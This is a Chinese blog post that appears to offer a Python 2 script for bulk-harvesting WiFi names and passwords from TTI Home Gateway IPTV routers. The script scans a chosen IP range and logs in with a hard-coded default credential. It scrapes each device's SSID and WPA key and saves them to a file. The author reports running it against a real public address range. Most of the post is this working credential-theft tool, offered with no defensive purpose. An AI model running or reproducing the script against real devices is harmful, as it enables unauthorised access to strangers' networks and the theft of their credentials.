批量获取TTI Home Gateway宽频IPTV无线ssid和密码脚本

这个漏洞主要是关于设备存在默认口令的问题,我这里用python模拟401登录认证后请求对应的页面就可以获取到wifi的ssid和密码,这里是脚本的代码,很简单

#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-08-08 09:59

import Queue
from threading import Thread
import time
import re
import os
import subprocess
import urllib2

#ip to num
def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]

#num to ip
def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,
                            (num & 0x00ff0000) >> 16,
                            (num & 0x0000ff00) >> 8,
                            num & 0x000000ff)

#get all ips list between start ip and end ip
def ip_range(start, end):
    return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]

#main function
def bThread(iplist):
    SETTHREAD = raw_input('Thread: ')
    print '[Note] Running...\n'
    threadl = []
    queue = Queue.Queue()
    hosts = iplist
    for host in hosts:
        queue.put(host)

    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
    for t in threadl:
        t.start()
    for t in threadl:
        t.join()

#create thread
class tThread(Thread):

    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue

    def run(self):
        global PORT
        while not self.queue.empty():
            host = self.queue.get()
            try:
                #print host
                checkTTI(host,PORT)
            except:
                continue

def checkTTI(host,port):
    aimurl = "http://"+host+":"+port+"/ssid.cgi"
    username = 'login'
    password = 'gzcatvnet'

    auth = urllib2.HTTPBasicAuthHandler()
    auth.add_password('', aimurl, username, password)
    opener = urllib2.build_opener(auth, urllib2.CacheFTPHandler)
    urllib2.install_opener(opener)

    try:
        data = urllib2.urlopen(aimurl,timeout = 5)
        htmlcontent = data.read()
        data.close()

        resssid = re.findall(r'<input id=\"tmp_ssidid\" value=\"(.+?)\" size=\"16\" maxlength=\"16\">',htmlcontent)
        reskey = re.findall(r'<input name=\"wl_wpa_psk\" value=\"(.+?)\" size=\"32\" maxlength=\"32\" type=\"password\" >',htmlcontent)
        #print log
        print host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8')
        #write to log file
        try:
            LOGFILE.write(host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8')+'\n')
            LOGFILE.flush()
        finally:
            LOGFILE.flush() 
    except:
        pass
        


if __name__ == '__main__':
    print '\n########### Hunt the TTI Home Gateway ##########\n'
    print '                Author 92ez.com'
    print '          Last modify 2015-08-08 09:59\n'
    print '################################################\n'
    # 
    global PORT
    PORT = '80'

    global LOGFILE
    LOGFILE = open(os.path.abspath('.')+'/TTI_KEY.log', 'w+')

    startIp = raw_input('Start IP: ')
    endIp = raw_input('End IP: ')

    iplist = ip_range(startIp, endIp)
    
    print '\n[Note] Will scan '+str(len(iplist))+" host...\n"

    bThread(iplist)


当然,扫描的网段可能比较有限,因为这种设备一般都有区域性,每个省所使用的设备可能不同。博主这里测试的网段是119.32.2.*到119.36.1.1

75b2ba3fc4494e24618332fcfbf288d7.png - 大小: 160.83 KB - 尺寸: 577 x 369 - 点击打开新窗口浏览全图

扫描完成后结果自动保存到文本文件

本文链接:https://www.92ez.com/?action=show&id=23343
!!! 转载请先联系non3gov@gmail.com授权并在显著位置注明作者和原文链接 !!! 小黑屋
提示:技术文章有一定的时效性,请先确认是否适用你当前的系统环境。

2015-08-08 09:37:54的屏幕截图.png

2015-08-08 09:37:54的屏幕截图.png

大小: 133.51 KB
尺寸: 631 x 508
浏览: 134 次
点击打开新窗口浏览全图

上一篇: osmocom-bb中cell_log的多种使用姿势
下一篇: TTI Home Gateway ssid and key

访客评论
#1
回复 111 2016-07-13, 12:00 PM
富国汇股份
发表评论

评论内容 (必填):